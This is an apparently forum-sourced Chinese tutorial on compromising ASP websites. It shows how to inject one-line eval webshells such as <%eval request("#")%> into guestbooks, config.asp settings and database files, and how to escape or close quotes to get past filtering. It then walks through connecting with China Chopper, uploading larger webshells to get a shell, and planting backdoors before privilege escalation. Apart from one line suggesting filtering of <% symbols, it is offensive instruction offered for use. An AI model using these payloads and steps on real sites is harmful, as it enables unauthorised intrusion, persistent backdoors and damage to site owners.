1進入後臺之後找網站信息配置
2在企業郵局裏面拷貝出來郵箱做好記錄,恢復用
3在企業郵箱內插入一句話
4保存配置,打開中國菜刀
5http://www.xxxx.cn/inc/config.asp 其中XXXX爲你的目標站
6菜刀右鍵添加,把網址第五步的丟進去 右邊那一欄輸入一句話的密碼pass(默認)下
面的腳本類型爲asp 其他不變 最後點添加
7用中國菜刀鏈接點擊文件管理
8在inc目錄下上傳一個小馬(注意更改後綴爲asp)
9 打開http://www.xxxx.cn/inc/你的小馬名字.asp
10 打開小馬輸入密碼進入小馬
11 複製文件地址輸入上面的欄中後面加大馬名字.asp
12 把大馬以txt文檔形式打開,複製粘貼至下面的欄中。
13 保存
14 訪問11步驟中的大馬
15 輸入大馬密碼,成功得到shell
一句話的總結
一 留言本插入
在留言框內 插入一句話
<%eval request("#")%>
<%execute request("#")%>
┼攠數畣整爠煥敵瑳∨≡┩愾
這三個都是asp一句話,在國內小站asp還是比較氾濫的。如果當前web沒有進行過濾可以直接以留言的方式提交過去。
如果過濾不嚴可以閉合插入。如最簡單的
%><%eval request("#")%><%
比如當前頁
http://site/guest/guestbook.asp
你在當前頁提交一句話後是不能直接鏈接http://site/guestbook.asp的,因爲一句話代碼並不在這裏!
這裏需要一個前提條件
1)他的數據庫是爲了防止*.mdb 下載而更名爲
*.asa or *.asp 格式
2)滿足了條件1的同時你知道他的數據庫位置
ex:http://site/guest/db/guestdb.asa or guest.asp
當滿足第一條 和第二條中的兩小條後
可以成功插入一句話
數據庫修改過後綴名 asa asp
知道具體位置
滿足以上條件後 在 http://site/guest/guestbook.asp 插入一句話
鏈接 http://site/guest/db/guestdb.asa
二 配置文件插入一句話
一般而言,後臺插一句話,如果數據庫擴展名是asp的話,那麼插數據庫,但是如果有配置文件可以插的話,那肯定是插入配置文件了,但是插入配置文件有一個很大的風險,那就是一旦出錯那麼全盤皆輸,有可能不僅僅造成後臺無法登陸,甚至有可能是整個網站系統崩潰,所以插入配置文件,請慎之又慎。
話歸正題,如果想插入配置文件,一般是config.asp,那麼首先需要了解這個文件的一般情況。
網站的配置一般是保存網站名,地址,email之類的,既然是字符,那麼格式應當是
webname=“test website”
對於這樣的配置插入一句話的話,我們的機會就是替換test website,那麼需要閉合2個”,同時要插入一句話,語句可以這樣
“%><%eval request(“d”%><%s=”
那麼在config.asp中就是
webname=“ “%><%eval request(“d”%><%s=” ”
第一個”是閉合前面的配置文件中的”,%>就是閉合前一段腳本,之後插入一句話<%eval request(“d”%>,現在要閉合原來的”和%>
所以加入<%s=”,這裏特別要注意“s=”,如果沒有這個等號的話,那麼就會成<%” “,這樣必將出錯。
好了,這是常規的辦法,現在我們回到開始那個問題,按照前面的方法插入
插入後,我們再點擊“網站設置” ,出現錯誤
從這個錯誤,我們可以得到2個信息。
第一,配置文件的路徑:http://www.target.com/zfbm/zfb/inc/config.asp
第二,網站名的變量爲webname。
由於我們閉合前面雙引號起”的那個雙引號收”被過濾成單引號’,所以就成了webname=” ‘,這樣的話那麼這個雙引號沒有閉合,由於雙引號是vbscript的控制符,沒有閉合config.asp運行必然出錯。那麼我們遇到這種雙引號被過濾了的情況改怎麼辦呢。
由於插入一句話必須要用雙引號括起來,而輸入雙引號又被過濾,所以我們可以利用他們自身的雙引號來解決。
在配置文件中,我們還可以看到這樣一些設置
就是配置網站的公告數 ,文章數等。可以假設一下,他必然是整數賦值,沒有雙引號包括
num=5
num是整數型,不然就成字符了num=”5〃
那麼我們的一句話就可以這樣構建
在公告數中我們插入5%><%eval request(webname)%><%
必須要有5,不然將會出錯,在網站名中我們插入”open”
由於我們沒有輸入雙引號,不存在過濾,我們利用 配置文件本身的雙引號來達到目的。那麼配置文件現在的內容如下
<% ……………….. webname=”open” num=5%><%eval request(webname)%><% webnum=7 ……. %> 我們的一句話就相應爲
eval request(“open”),open爲seo/’>密碼。
用菜刀成功連接
從上可見,我們成功利用配置文件本身避開了一句話中雙引號被過濾的問題。
那麼在網頁設計方面,我們可以增加過濾<,%,>或者組合<%,%>這些特殊符號,禁止這些符號的輸入,那麼將大大增加網頁安全。
三 網站友情鏈接或者是管理員添加插入一句話,等等...就跟配置文件類似
當成功在配置文件中插入一句話後,可以連接 http://site/inc/config.asp
也就是說你的一句話最終保存在那個asp文件中你就去連那個ASP文件,並不是你在留言本主頁插入的一句話你就去連接留言本主頁!
你需要知道你的一句話的歸屬地。
在成功得到webshell ,需要先留後門在進一步提權。因爲你提權時弄出動靜後會前功盡棄。留一個一句話是很好的選擇。
可以把後門直接寫入在asp文件中,也可以自己重新上傳一個ASP馬,在修改原有ASP文件的同時需要備份一下以防插掛後可以補救。有人喜歡插入在dbcon.asp 數據連接文件中或者其他位置。這個跟當時情況而定。